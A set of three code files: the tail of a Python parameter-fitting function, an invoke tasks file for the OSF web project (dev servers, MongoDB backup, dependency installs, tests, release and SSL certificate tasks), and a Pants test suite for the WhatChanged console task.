            # parameters in modeldyn as a side effect of each evaluation.
            g = abs(minimize_scalar(optfn, bounds=(1, 250), args=(data, modeldyn, temp, doHyst), method='bounded', options=options).x)
            print('g =', g)

        else:
            modeldyn.GParam[theTemp] = 0
            theGParam = 0
            optfn(theGParam, data, modeldyn, temp, doHyst)
    return modeldyn
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Invoke tasks. To run a task, run ``$ invoke <COMMAND>``. To see a list of
commands, run ``$ invoke --list``.
"""
import os
import sys
import code
import platform
import subprocess
import logging
from invoke import task, run
from website import settings
logging.getLogger('invoke').setLevel(logging.CRITICAL)
HERE = os.path.dirname(os.path.abspath(__file__))
WHEELHOUSE_PATH = os.environ.get('WHEELHOUSE')
def get_bin_path():
    """Return the directory that contains the running Python executable."""
    bin_dir, _ = os.path.split(sys.executable)
    return bin_dir
def bin_prefix(cmd):
    """Return *cmd* prefixed with the active interpreter's bin directory."""
    prefixed = os.path.join(get_bin_path(), cmd)
    return prefixed
# Prefer the rednose output plugin when it is importable.
TEST_CMD = 'nosetests'
try:
    __import__('rednose')
except ImportError:
    pass
else:
    TEST_CMD = 'nosetests --rednose'
@task
def server(host=None, port=5000, debug=True, live=False):
    """Run the app server.

    With ``live`` serve through livereload, watching the static public
    directory; otherwise use Flask's builtin server (threaded when debug).
    """
    from website.app import init_app
    app = init_app(set_backends=True, routes=True)
    settings.API_SERVER_PORT = port

    if live:
        from livereload import Server
        server = Server(app.wsgi_app)
        server.watch(os.path.join(HERE, 'website', 'static', 'public'))
        server.serve(port=port)
    else:
        # extra_files: restart the dev server when the asset hash file changes
        app.run(host=host, port=port, debug=debug, threaded=debug, extra_files=[settings.ASSET_HASH_PATH])
@task
def apiserver(port=8000, live=False):
    """Run the API server."""
    parts = ['python manage.py runserver {}'.format(port)]
    if live:
        parts.append('livereload')
    run(' '.join(parts), echo=True, pty=True)
SHELL_BANNER = """
{version}
+--------------------------------------------------+
|cccccccccccccccccccccccccccccccccccccccccccccccccc|
|ccccccccccccccccccccccOOOOOOOccccccccccccccccccccc|
|ccccccccccccccccccccOOOOOOOOOOcccccccccccccccccccc|
|cccccccccccccccccccOOOOOOOOOOOOccccccccccccccccccc|
|cccccccccOOOOOOOcccOOOOOOOOOOOOcccOOOOOOOccccccccc|
|cccccccOOOOOOOOOOccOOOOOsssOOOOcOOOOOOOOOOOccccccc|
|ccccccOOOOOOOOOOOOccOOssssssOOccOOOOOOOOOOOccccccc|
|ccccccOOOOOOOOOOOOOcOssssssssOcOOOOOOOOOOOOOcccccc|
|ccccccOOOOOOOOOOOOsOcOssssssOOOOOOOOOOOOOOOccccccc|
|cccccccOOOOOOOOOOOssccOOOOOOcOssOOOOOOOOOOcccccccc|
|cccccccccOOOOOOOsssOccccccccccOssOOOOOOOcccccccccc|
|cccccOOOccccOOssssOccccccccccccOssssOccccOOOcccccc|
|ccOOOOOOOOOOOOOccccccccccccccccccccOOOOOOOOOOOOccc|
|cOOOOOOOOssssssOcccccccccccccccccOOssssssOOOOOOOOc|
|cOOOOOOOssssssssOccccccccccccccccOsssssssOOOOOOOOc|
|cOOOOOOOOsssssssOccccccccccccccccOsssssssOOOOOOOOc|
|cOOOOOOOOOssssOOccccccccccccccccccOsssssOOOOOOOOcc|
|cccOOOOOOOOOOOOOOOccccccccccccccOOOOOOOOOOOOOOOccc|
|ccccccccccccOOssssOOccccccccccOssssOOOcccccccccccc|
|ccccccccOOOOOOOOOssOccccOOcccOsssOOOOOOOOccccccccc|
|cccccccOOOOOOOOOOOsOcOOssssOcOssOOOOOOOOOOOccccccc|
|ccccccOOOOOOOOOOOOOOOsssssssOcOOOOOOOOOOOOOOcccccc|
|ccccccOOOOOOOOOOOOOcOssssssssOcOOOOOOOOOOOOOcccccc|
|ccccccOOOOOOOOOOOOcccOssssssOcccOOOOOOOOOOOccccccc|
|ccccccccOOOOOOOOOcccOOOOOOOOOOcccOOOOOOOOOcccccccc|
|ccccccccccOOOOcccccOOOOOOOOOOOcccccOOOOccccccccccc|
|ccccccccccccccccccccOOOOOOOOOOcccccccccccccccccccc|
|cccccccccccccccccccccOOOOOOOOOcccccccccccccccccccc|
|cccccccccccccccccccccccOOOOccccccccccccccccccccccc|
|cccccccccccccccccccccccccccccccccccccccccccccccccc|
+--------------------------------------------------+
Welcome to the OSF Python Shell. Happy hacking!
Available variables:
{context}
"""
def make_shell_context():
    """Build the namespace exposed by the ``invoke shell`` task.

    Initializes the OSF app and returns a dict of frequently used objects
    (app, database, auth/model classes, requests shortcuts, settings).
    """
    from modularodm import Q
    from framework.auth import User, Auth
    from framework.mongo import database
    from website.app import init_app
    from website.project.model import Node
    from website import models  # all models
    from website import settings
    import requests
    app = init_app()
    context = {
        'app': app,
        'db': database,
        'User': User,
        'Auth': Auth,
        'Node': Node,
        'Q': Q,
        'models': models,
        'run_tests': test,
        'rget': requests.get,
        'rpost': requests.post,
        'rdelete': requests.delete,
        'rput': requests.put,
        'settings': settings,
    }
    try:  # Add a fake factory for generating fake names, emails, etc.
        from faker import Factory
        fake = Factory.create()
        context['fake'] = fake
    except ImportError:
        pass
    return context
def format_context(context):
    """Render a shell-context dict as newline-separated 'name: repr' lines."""
    return '\n'.join(
        '{}: {!r}'.format(key, value) for key, value in context.items()
    )
# Shell command adapted from Flask-Script. See NOTICE for license info.
@task
def shell():
    """Open an interactive shell preloaded with the OSF context.

    Tries IPython (both the pre-0.11 and modern embed APIs) and falls back
    to the stdlib interpreter.
    """
    context = make_shell_context()
    banner = SHELL_BANNER.format(version=sys.version,
                                 context=format_context(context)
                                 )
    try:
        try:
            # 0.10.x
            from IPython.Shell import IPShellEmbed
            ipshell = IPShellEmbed(banner=banner)
            ipshell(global_ns={}, local_ns=context)
        except ImportError:
            # 0.12+
            from IPython import embed
            embed(banner1=banner, user_ns=context)
        return
    except ImportError:
        pass
    # fallback to basic python shell
    code.interact(banner, local=context)
    return
@task(aliases=['mongo'])
def mongoserver(daemon=False, config=None):
    """Run the mongod process, optionally daemonized and/or with a config file."""
    if not config:
        # Fall back to the default TokuMX config for this OS, if known.
        default_configs = {
            'darwin': '/usr/local/etc/tokumx.conf',  # default for homebrew install
            'linux': '/etc/tokumx.conf',
        }
        # Renamed from `platform` to avoid shadowing the module-level import.
        sys_name = str(sys.platform).lower()
        config = default_configs.get(sys_name)
    cmd = 'mongod --port {0}'.format(settings.DB_PORT)
    if config:
        cmd += ' --config {0}'.format(config)
    if daemon:
        cmd += " --fork"
    run(cmd, echo=True)
@task(aliases=['mongoshell'])
def mongoclient():
    """Run the mongo shell for the OSF database."""
    run("mongo {db} --port {port}".format(db=settings.DB_NAME,
                                          port=settings.DB_PORT), pty=True)
@task
def mongodump(path):
    """Back up the contents of the running OSF database into ``path``.

    Appends --username/--password when configured in settings and prints
    the matching restore command afterwards.
    """
    db = settings.DB_NAME
    port = settings.DB_PORT

    # BUG FIX: `pty=True` was previously passed to str.format(), where it
    # was silently ignored (str.format discards unused keyword arguments);
    # the dead argument has been removed.
    cmd = "mongodump --db {db} --port {port} --out {path}".format(
        db=db,
        port=port,
        path=path,
    )

    if settings.DB_USER:
        cmd += ' --username {0}'.format(settings.DB_USER)
    if settings.DB_PASS:
        cmd += ' --password {0}'.format(settings.DB_PASS)

    run(cmd, echo=True)

    print()
    print("To restore from the dumped database, run `invoke mongorestore {0}`".format(
        os.path.join(path, settings.DB_NAME)))
@task
def mongorestore(path, drop=False):
    """Restores the running OSF database with the contents of the database at
    the location given its argument.

    By default, the contents of the specified database are added to
    the existing database. The `--drop` option will cause the existing database
    to be dropped.

    A caveat: if you `invoke mongodump {path}`, you must restore with
    `invoke mongorestore {path}/{settings.DB_NAME}, as that's where the
    database dump will be stored.
    """
    db = settings.DB_NAME
    port = settings.DB_PORT

    # BUG FIX: `pty=True` was previously passed to str.format(), where it
    # was silently ignored (str.format discards unused keyword arguments);
    # the dead argument has been removed.
    cmd = "mongorestore --db {db} --port {port}".format(
        db=db,
        port=port,
    )

    if settings.DB_USER:
        cmd += ' --username {0}'.format(settings.DB_USER)
    if settings.DB_PASS:
        cmd += ' --password {0}'.format(settings.DB_PASS)

    if drop:
        cmd += " --drop"

    cmd += " " + path
    run(cmd, echo=True)
@task
def sharejs(host=None, port=None, db_host=None, db_port=None, db_name=None, cors_allow_origin=None):
    """Start a local ShareJS server, configured through environment variables."""
    # Export each supplied option; unset options leave the environment alone.
    optional_env = [
        ('SHAREJS_SERVER_HOST', host),
        ('SHAREJS_SERVER_PORT', port),
        ('SHAREJS_DB_HOST', db_host),
        ('SHAREJS_DB_PORT', db_port),
        ('SHAREJS_DB_NAME', db_name),
        ('SHAREJS_CORS_ALLOW_ORIGIN', cors_allow_origin),
    ]
    for var, value in optional_env:
        if value:
            os.environ[var] = value

    if settings.SENTRY_DSN:
        os.environ['SHAREJS_SENTRY_DSN'] = settings.SENTRY_DSN

    share_server = os.path.join(settings.ADDON_PATH, 'wiki', 'shareServer.js')
    run("node {0}".format(share_server))
@task(aliases=['celery'])
def celery_worker(level="debug"):
    """Run the Celery worker (with beat) at the given log level."""
    # beat sets up a cron, refer to website/settings/celeryconfig
    worker_cmd = 'celery worker -A framework.tasks -l {0} --beat'.format(level)
    run(bin_prefix(worker_cmd))
@task
def rabbitmq():
    """Start a local rabbitmq server in the foreground.

    NOTE: development only -- production should run the broker as a daemon.
    """
    run("rabbitmq-server", pty=True)
@task(aliases=['elastic'])
def elasticsearch():
    """Start a local elasticsearch server.

    NOTE: Requires that elasticsearch is installed. See README for instructions
    """
    import platform
    # NOTE(review): platform.linux_distribution is deprecated/removed in
    # newer Pythons -- revisit if this file is ported forward.
    if platform.linux_distribution()[0] == 'Ubuntu':
        run("sudo service elasticsearch start")
    elif platform.system() == 'Darwin':  # Mac OSX
        run('elasticsearch')
    else:
        print("Your system is not recognized, you will have to start elasticsearch manually")
@task
def migrate_search(delete=False, index=settings.ELASTIC_INDEX):
    """Migrate the search-enabled models.

    NOTE: the default for ``index`` is bound once at import time from
    settings.ELASTIC_INDEX.
    """
    from website.search_migration.migrate import migrate
    migrate(delete, index=index)
@task
def rebuild_search():
    """Delete and recreate the elasticsearch index, then re-run the migration."""
    es_uri = settings.ELASTIC_URI
    es_index = settings.ELASTIC_INDEX
    run("curl -s -XDELETE {uri}/{index}*".format(uri=es_uri, index=es_index))
    run("curl -s -XPUT {uri}/{index}".format(uri=es_uri, index=es_index))
    migrate_search()
@task
def mailserver(port=1025):
    """Run a debugging SMTP server on localhost at the given port."""
    mail_cmd = 'python -m smtpd -n -c DebuggingServer localhost:{port}'.format(port=port)
    run(bin_prefix(mail_cmd), pty=True)
@task
def jshint():
    """Run the JSHint syntax check over the website's static JS."""
    js_folder = os.path.join(HERE, 'website', 'static', 'js')
    run('jshint {}'.format(js_folder), echo=True)
@task(aliases=['flake8'])
def flake():
    """Run flake8 over the whole repository."""
    run('flake8 .', echo=True)
def pip_install(req_file):
    """Return the proper 'pip install' command for installing the dependencies
    defined in ``req_file``, using the wheelhouse when one is configured.
    """
    base = 'pip install --exists-action w --upgrade -r {} '.format(req_file)
    cmd = bin_prefix(base)
    if WHEELHOUSE_PATH:
        cmd = cmd + ' --no-index --find-links={}'.format(WHEELHOUSE_PATH)
    return cmd
@task(aliases=['req'])
def requirements(addons=False, release=False, dev=False, metrics=False):
    """Install python dependencies.

    Examples:

        inv requirements --dev
        inv requirements --addons
        inv requirements --release
        inv requirements --metrics
    """
    if release or addons:
        addon_requirements()
    # "release" takes precedence over dev/metrics; base file otherwise.
    if release:
        req_name = os.path.join('requirements', 'release.txt')
    elif dev:
        req_name = os.path.join('requirements', 'dev.txt')
    elif metrics:
        req_name = os.path.join('requirements', 'metrics.txt')
    else:
        req_name = 'requirements.txt'
    run(pip_install(os.path.join(HERE, req_name)), echo=True)
@task
def test_module(module=None, verbosity=2):
    """Run the test command against one module or a list of modules."""
    if isinstance(module, list):
        target = ' '.join(module)
    else:
        target = module
    args = " --verbosity={0} -s {1}".format(verbosity, target)
    # Use pty so the process buffers "correctly"
    run(bin_prefix(TEST_CMD) + args, pty=True)
@task
def test_osf():
    """Run the core OSF test suite (everything under tests/)."""
    test_module(module="tests/")
@task
def test_addons():
    """Run all the tests in the addons directory.

    Builds one path per requested addon and hands the list to test_module.
    """
    # Idiom: the manual append loop is replaced with a list comprehension.
    modules = [
        os.path.join(settings.BASE_PATH, 'addons', addon)
        for addon in settings.ADDONS_REQUESTED
    ]
    test_module(module=modules)
@task
def test(all=False, syntax=False):
    """
    Run unit tests: OSF (always), plus addons and syntax checks (optional)
    """
    # Syntax checks first so obvious lint failures abort early.
    if syntax:
        flake()
        jshint()

    test_osf()

    if all:
        test_addons()
        # Run the JS suite once, headlessly.
        karma(single=True, browsers='PhantomJS')
@task
def karma(single=False, sauce=False, browsers=None):
    """Run JS tests with Karma. Requires Chrome to be installed."""
    karma_bin = os.path.join(
        HERE, 'node_modules', 'karma', 'bin', 'karma'
    )
    parts = ['{} start'.format(karma_bin)]
    if sauce:
        parts.append('karma.saucelabs.conf.js')
    if single:
        parts.append('--single-run')
    # Use browsers if specified on the command-line, otherwise default
    # to what's specified in karma.conf.js
    if browsers:
        parts.append('--browsers {}'.format(browsers))
    run(' '.join(parts), echo=True)
@task
def wheelhouse(addons=False, release=False, dev=False):
    """Build wheels for python dependencies into the wheelhouse directory."""
    if release:
        req_file = os.path.join(HERE, 'requirements', 'release.txt')
    elif dev:
        req_file = os.path.join(HERE, 'requirements', 'dev.txt')
    else:
        req_file = os.path.join(HERE, 'requirements.txt')
    template = 'pip wheel --find-links={} -r {} --wheel-dir={}'
    run(template.format(WHEELHOUSE_PATH, req_file, WHEELHOUSE_PATH), pty=True)
    if not addons:
        return
    # Also wheel each addon's own requirements file, when present.
    for directory in os.listdir(settings.ADDON_PATH):
        path = os.path.join(settings.ADDON_PATH, directory)
        if os.path.isdir(path):
            req_file = os.path.join(path, 'requirements.txt')
            if os.path.exists(req_file):
                run(template.format(WHEELHOUSE_PATH, req_file, WHEELHOUSE_PATH), pty=True)
@task
def addon_requirements():
    """Install all addon requirements.

    Scans each addon directory and pip-installs its requirements.txt when
    one exists, honoring the wheelhouse if configured.
    """
    for directory in os.listdir(settings.ADDON_PATH):
        path = os.path.join(settings.ADDON_PATH, directory)
        if not os.path.isdir(path):
            continue
        requirements_file = os.path.join(path, 'requirements.txt')
        # BUG FIX: existence was previously probed with a bare open() call
        # whose file handle was never closed (and the surrounding try also
        # swallowed IOError raised later by run()).  Test existence instead.
        if not os.path.isfile(requirements_file):
            continue
        print('Installing requirements for {0}'.format(directory))
        cmd = 'pip install --exists-action w --upgrade -r {0}'.format(requirements_file)
        if WHEELHOUSE_PATH:
            cmd += ' --no-index --find-links={}'.format(WHEELHOUSE_PATH)
        run(bin_prefix(cmd))
    print('Finished')
@task
def encryption(owner=None):
    """Generate GnuPG key.

    For local development:
    > invoke encryption
    On Linode:
    > sudo env/bin/invoke encryption --owner www-data
    """
    if not settings.USE_GNUPG:
        print('GnuPG is not enabled. No GnuPG key will be generated.')
        return

    import gnupg
    gpg = gnupg.GPG(gnupghome=settings.GNUPG_HOME, gpgbinary=settings.GNUPG_BINARY)
    # Skip generation when a key already exists in the keyring.
    if gpg.list_keys():
        print('Existing GnuPG key found')
        return
    print('Generating GnuPG key')
    key_input = gpg.gen_key_input(name_real='OSF Generated Key')
    gpg.gen_key(key_input)

    if owner:
        run('sudo chown -R {0} {1}'.format(owner, settings.GNUPG_HOME))
@task
def travis_addon_settings():
    """Activate each addon's Travis settings by copying local-travis.py to local.py."""
    for directory in os.listdir(settings.ADDON_PATH):
        path = os.path.join(settings.ADDON_PATH, directory, 'settings')
        if not os.path.isdir(path):
            continue
        # BUG FIX: existence was previously probed with a bare open() call
        # whose handle leaked; check with os.path.isfile instead.
        if os.path.isfile(os.path.join(path, 'local-travis.py')):
            run('cp {path}/local-travis.py {path}/local.py'.format(path=path))
@task
def copy_addon_settings():
    """Create each addon's local.py from local-dist.py when it is missing."""
    for directory in os.listdir(settings.ADDON_PATH):
        path = os.path.join(settings.ADDON_PATH, directory, 'settings')
        if os.path.isdir(path) and not os.path.isfile(os.path.join(path, 'local.py')):
            # BUG FIX: existence was previously probed with a bare open()
            # call whose handle leaked; check with os.path.isfile instead.
            if os.path.isfile(os.path.join(path, 'local-dist.py')):
                run('cp {path}/local-dist.py {path}/local.py'.format(path=path))
@task
def copy_settings(addons=False):
    """Create website (and optionally addon) local settings from dist files."""
    # Website settings
    if not os.path.isfile('website/settings/local.py'):
        print('Creating local.py file')
        run('cp website/settings/local-dist.py website/settings/local.py')
    # Addon settings
    if addons:
        copy_addon_settings()
@task
def packages():
    """Install system-level packages (homebrew on OS X; Linux is a TODO)."""
    brew_commands = (
        'update',
        'upgrade',
        'install libxml2',
        'install libxslt',
        'install elasticsearch',
        'install gpg',
        'install node',
        'tap tokutek/tokumx',
        'install tokumx-bin',
    )
    if platform.system() == 'Darwin':
        print('Running brew commands')
        for item in brew_commands:
            run('brew {cmd}'.format(cmd=item))
    elif platform.system() == 'Linux':
        # TODO: Write a script similar to brew bundle for Ubuntu
        # e.g., run('sudo apt-get install [list of packages]')
        pass
@task
def npm_bower():
    """Install the bower CLI globally via npm."""
    print('Installing bower')
    run('npm install -g bower', echo=True)
@task(aliases=['bower'])
def bower_install():
    """Prune then install bower-managed front-end packages."""
    print('Installing bower-managed packages')
    bower_bin = os.path.join(HERE, 'node_modules', 'bower', 'bin', 'bower')
    for subcommand in ('prune', 'install'):
        run('{} {}'.format(bower_bin, subcommand), echo=True)
@task
def setup():
    """Creates local settings, installs requirements, and generates encryption key"""
    copy_settings(addons=True)
    packages()
    requirements(addons=True, dev=True)
    encryption()
    from website.app import build_js_config_files
    from website import settings
    # Build nodeCategories.json before building assets
    build_js_config_files(settings)
    # NOTE(review): `assets` is defined elsewhere in this tasks file.
    assets(dev=True, watch=False)
@task
def analytics():
    """Run every analytics script's main() after initializing the app."""
    from website.app import init_app
    import matplotlib
    # Select a non-interactive backend before any pyplot use.
    matplotlib.use('Agg')
    init_app()
    from scripts.analytics import (
        logs, addons, comments, folders, links, watch, email_invites,
        permissions, profile, benchmarks
    )
    modules = (
        logs, addons, comments, folders, links, watch, email_invites,
        permissions, profile, benchmarks
    )
    for module in modules:
        module.main()
@task
def clear_sessions(months=1, dry_run=False):
    """Delegate to scripts.clear_sessions to purge sessions older than ``months``."""
    from website.app import init_app
    init_app(routes=False, set_backends=True)
    # The local import shadows this task's name inside the function body.
    from scripts import clear_sessions
    clear_sessions.clear_sessions_relative(months=months, dry_run=dry_run)
# Release tasks
@task
def hotfix(name, finish=False, push=False):
    """Rename hotfix branch to hotfix/<next-patch-version> and optionally
    finish hotfix.

    :param name: current name of the branch to promote.
    :param finish: also run ``git flow hotfix finish`` for the new version.
    :param push: push master, tags, and develop to origin.
    """
    print('Checking out master to calculate current version')
    run('git checkout master')
    latest_version = latest_tag_info()['current_version']
    print('Current version is: {}'.format(latest_version))
    # Bump only the patch component: X.Y.Z -> X.Y.(Z+1)
    major, minor, patch = latest_version.split('.')
    next_patch_version = '.'.join([major, minor, str(int(patch) + 1)])
    print('Bumping to next patch version: {}'.format(next_patch_version))
    print('Renaming branch...')
    new_branch_name = 'hotfix/{}'.format(next_patch_version)
    run('git checkout {}'.format(name), echo=True)
    run('git branch -m {}'.format(new_branch_name), echo=True)
    if finish:
        run('git flow hotfix finish {}'.format(next_patch_version), echo=True, pty=True)
    if push:
        run('git push origin master', echo=True)
        run('git push --tags', echo=True)
        run('git push origin develop', echo=True)
@task
def feature(name, finish=False, push=False):
    """Rename the current branch to a feature branch and optionally finish it."""
    print('Renaming branch...')
    branch = 'feature/{}'.format(name)
    run('git branch -m {}'.format(branch), echo=True)
    if finish:
        run('git flow feature finish {}'.format(name), echo=True)
    if push:
        run('git push origin develop', echo=True)
# Adapted from bumpversion
def latest_tag_info():
    """Return info about the most recent annotated git tag.

    Parses ``git describe --dirty --tags --long`` output into a dict with keys
    ``commit_sha``, ``distance_to_latest_tag``, ``current_version``, and
    (optionally) ``dirty``.

    Raises subprocess.CalledProcessError when git describe fails (e.g. no tags).
    """
    try:
        # git-describe doesn't update the git-index, so we do that
        # subprocess.check_output(["git", "update-index", "--refresh"])
        # get info about the latest tag in git
        describe_out = subprocess.check_output([
            "git",
            "describe",
            "--dirty",
            "--tags",
            "--long",
            "--abbrev=40"
        ], stderr=subprocess.STDOUT
        ).decode().split("-")
    except subprocess.CalledProcessError:
        # Callers (e.g. hotfix) have no sane fallback version, so propagate.
        # (Previously `raise err` was followed by an unreachable `return {}`.)
        raise
    info = {}
    if describe_out[-1].strip() == "dirty":
        info["dirty"] = True
        describe_out.pop()
    # describe output is "<tag>-<distance>-g<sha>[-dirty]", split on "-"
    info["commit_sha"] = describe_out.pop().lstrip("g")
    info["distance_to_latest_tag"] = int(describe_out.pop())
    info["current_version"] = describe_out.pop().lstrip("v")
    assert 0 == len(describe_out)
    return info
# Tasks for generating and bundling SSL certificates
# See http://cosdev.readthedocs.org/en/latest/osf/ops.html for details
@task
def generate_key(domain, bits=2048):
    """Generate a des3 passphrase-protected RSA private key ``<domain>.key``."""
    cmd = 'openssl genrsa -des3 -out {0}.key {1}'.format(domain, bits)
    run(cmd)
@task
def generate_key_nopass(domain):
    """Write ``<domain>.key.nopass``: the generated key with its passphrase removed."""
    cmd = 'openssl rsa -in {domain}.key -out {domain}.key.nopass'.format(
        domain=domain
    )
    run(cmd)
@task
def generate_csr(domain):
    """Generate a certificate signing request ``<domain>.csr`` from the passphrase-less key."""
    cmd = 'openssl req -new -key {domain}.key.nopass -out {domain}.csr'.format(
        domain=domain
    )
    run(cmd)
@task
def request_ssl_cert(domain):
    """Generate a key, a key with password removed, and a signing request for
    the specified domain.
    Usage:
    > invoke request_ssl_cert pizza.osf.io
    """
    # Chains the three openssl tasks defined above, in order.
    generate_key(domain)
    generate_key_nopass(domain)
    generate_csr(domain)
@task
def bundle_certs(domain, cert_path):
    """Concatenate certificates from NameCheap in the correct order. Certificate
    files must be in the same directory.
    """
    # Order matters: domain cert first, then intermediates, then the root.
    chain = (
        '{0}.crt'.format(domain),
        'COMODORSADomainValidationSecureServerCA.crt',
        'COMODORSAAddTrustCA.crt',
        'AddTrustExternalCARoot.crt',
    )
    cert_paths = [os.path.join(cert_path, name) for name in chain]
    run('cat {certs} > {domain}.bundle.crt'.format(
        certs=' '.join(cert_paths),
        domain=domain,
    ))
@task
def clean_assets():
    """Remove built JS files."""
    # Deletes website/static/public/js wholesale; webpack regenerates it.
    public_path = os.path.join(HERE, 'website', 'static', 'public')
    js_path = os.path.join(public_path, 'js')
    run('rm -rf {0}'.format(js_path), echo=True)
@task(aliases=['pack'])
def webpack(clean=False, watch=False, dev=False):
    """Build static assets with webpack."""
    if clean:
        clean_assets()
    webpack_bin = os.path.join(HERE, 'node_modules', 'webpack', 'bin', 'webpack.js')
    args = [webpack_bin]
    # Colored output only for interactive debug builds; progress bar otherwise.
    args.append('--colors' if settings.DEBUG_MODE and dev else '--progress')
    if watch:
        args.append('--watch')
    config_file = 'webpack.dev.config.js' if dev else 'webpack.prod.config.js'
    args.append('--config {0}'.format(config_file))
    run(' '.join(args), echo=True)
@task()
def build_js_config_files():
    """Regenerate JS config files (e.g. nodeCategories.json) from website settings."""
    from website import settings
    from website.app import build_js_config_files as _build_js_config_files
    print('Building JS config files...')
    _build_js_config_files(settings)
    print("...Done.")
@task()
def assets(dev=False, watch=False):
    """Install and build static assets."""
    npm = 'npm install'
    if not dev:
        # Skip devDependencies for production installs.
        npm += ' --production'
    run(npm, echo=True)
    bower_install()
    build_js_config_files()
    # Always set clean=False to prevent possible mistakes
    # on prod
    webpack(clean=False, watch=watch, dev=dev)
@task
def generate_self_signed(domain):
    """Generate self-signed SSL key and certificate.
    """
    # One-shot key + cert pair, valid 365 days, no passphrase (-nodes).
    cmd = (
        'openssl req -x509 -nodes -days 365 -newkey rsa:2048'
        ' -keyout {0}.key -out {0}.crt'
    ).format(domain)
    run(cmd)
@task
def update_citation_styles():
    """Re-parse citation style files and report how many were processed."""
    from scripts import parse_citation_styles
    total = parse_citation_styles.main()
    print("Parsed {} styles".format(total))
|
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from textwrap import dedent
from pants.backend.codegen.protobuf.java.java_protobuf_library import JavaProtobufLibrary
from pants.backend.codegen.thrift.java.java_thrift_library import JavaThriftLibrary
from pants.backend.codegen.thrift.python.python_thrift_library import PythonThriftLibrary
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.scala_jar_dependency import ScalaJarDependency
from pants.backend.jvm.targets.unpacked_jars import UnpackedJars
from pants.backend.python.targets.python_library import PythonLibrary
from pants.build_graph.address_lookup_error import AddressLookupError
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.build_graph.remote_sources import RemoteSources
from pants.build_graph.resources import Resources
from pants.core_tasks.what_changed import WhatChanged
from pants.goal.workspace import Workspace
from pants.java.jar.jar_dependency import JarDependency
from pants.source.wrapped_globs import Globs, RGlobs
from pants_test.tasks.task_test_base import ConsoleTaskTestBase
class BaseWhatChangedTest(ConsoleTaskTestBase):
  """Shared fixture for the WhatChanged console-task tests."""

  @property
  def alias_groups(self):
    # TODO: Use dummy target types here, instead of depending on other backends.
    return BuildFileAliases(
      targets={
        'java_library': JavaLibrary,
        'python_library': PythonLibrary,
        'jar_library': JarLibrary,
        'unpacked_jars': UnpackedJars,
        'resources': Resources,
        'java_thrift_library': JavaThriftLibrary,
        'java_protobuf_library': JavaProtobufLibrary,
        'python_thrift_library': PythonThriftLibrary,
        'remote_sources': RemoteSources,
      },
      context_aware_object_factories={
        'globs': Globs,
        'rglobs': RGlobs,
      },
      objects={
        'jar': JarDependency,
        'scala_jar': ScalaJarDependency,
      }
    )

  @classmethod
  def task_type(cls):
    return WhatChanged

  def assert_console_output(self, *output, **kwargs):
    # Always supply an (empty) exclude list unless the caller overrides it.
    merged = {'exclude_target_regexp': []}
    merged.update(kwargs.get('options', {}))
    kwargs['options'] = merged
    super(BaseWhatChangedTest, self).assert_console_output(*output, **kwargs)

  def workspace(self, files=None, parent=None, diffspec=None, diff_files=None):
    """Build a Workspace stub that asserts the task queries it as expected."""
    test = self

    class MockWorkspace(Workspace):
      def touched_files(_, p):
        test.assertEqual(parent or 'HEAD', p)
        return files or []

      def changes_in(_, ds):
        test.assertEqual(diffspec, ds)
        return diff_files or []

    return MockWorkspace()
class WhatChangedTestBasic(BaseWhatChangedTest):
  """Smoke tests plus the BUILD-file fixture shared by the subclasses below."""
  def test_nochanges(self):
    # No touched files -> no owning targets reported.
    self.assert_console_output(workspace=self.workspace())
  def test_parent(self):
    # --changes-since is forwarded to Workspace.touched_files.
    self.assert_console_output(options={'changes_since': '42'},
                               workspace=self.workspace(parent='42'))
  def test_files(self):
    # With --files, the raw changed paths are listed instead of owning targets.
    self.assert_console_output(
      'a/b/c',
      'd',
      'e/f',
      options={'files': True},
      workspace=self.workspace(files=['a/b/c', 'd', 'e/f'])
    )
  def setUp(self):
    """Create an in-memory BUILD layout exercising the various target types."""
    super(WhatChangedTestBasic, self).setUp()
    self.add_to_build_file('root/src/py/a', dedent("""
      python_library(
        name='alpha',
        sources=['b/c', 'd'],
        resources=['test.resources']
      )
      jar_library(
        name='beta',
        jars=[
          jar(org='gamma', name='ray', rev='1.137.bruce_banner')
        ]
      )
    """))
    self.add_to_build_file('root/src/py/1', dedent("""
      python_library(
        name='numeric',
        sources=['2']
      )
    """))
    # a <- b <- c dependency chain used by the include_dependees tests.
    self.add_to_build_file('root/src/py/dependency_tree/a', dedent("""
      python_library(
        name='a',
        sources=['a.py'],
      )
    """))
    self.add_to_build_file('root/src/py/dependency_tree/b', dedent("""
      python_library(
        name='b',
        sources=['b.py'],
        dependencies=['root/src/py/dependency_tree/a']
      )
    """))
    self.add_to_build_file('root/src/py/dependency_tree/c', dedent("""
      python_library(
        name='c',
        sources=['c.py'],
        dependencies=['root/src/py/dependency_tree/b']
      )
    """))
    # Two targets owning the same source file (multiply-owned case).
    self.add_to_build_file('root/src/thrift', dedent("""
      java_thrift_library(
        name='thrift',
        sources=['a.thrift']
      )
      python_thrift_library(
        name='py-thrift',
        sources=['a.thrift']
      )
    """))
    self.add_to_build_file('root/src/resources/a', dedent("""
      resources(
        name='a_resources',
        sources=['a.resources']
      )
    """))
    # Targets using recursive (rglobs) and flat (globs) source globs.
    self.add_to_build_file('root/src/java/a', dedent("""
      java_library(
        name='a_java',
        sources=rglobs("*.java"),
      )
    """))
    self.add_to_build_file('root/src/java/b', dedent("""
      java_library(
        name='b_java',
        sources=globs("*.java"),
      )
    """))
    # Suffixed sibling BUILD files (BUILD.twitter next to BUILD).
    self.add_to_build_file('root/3rdparty/BUILD.twitter', dedent("""
      jar_library(
        name='dummy',
        jars=[
          jar(org='foo', name='ray', rev='1.45')
        ])
    """))
    self.add_to_build_file('root/3rdparty/BUILD', dedent("""
      jar_library(
        name='dummy1',
        jars=[
          jar(org='foo1', name='ray', rev='1.45')
        ])
    """))
    # This is a directory that might confuse case insensitive file systems (on macs for example).
    # It should not be treated as a BUILD file.
    self.create_dir('root/scripts/a/build')
    self.add_to_build_file('root/scripts/BUILD', dedent("""
      java_library(
        name='scripts',
        sources=['a/build/scripts.java'],
      )
    """))
    self.add_to_build_file('BUILD.config', dedent("""
      resources(
        name='pants-config',
        sources = globs('pants.ini*')
      )
    """))
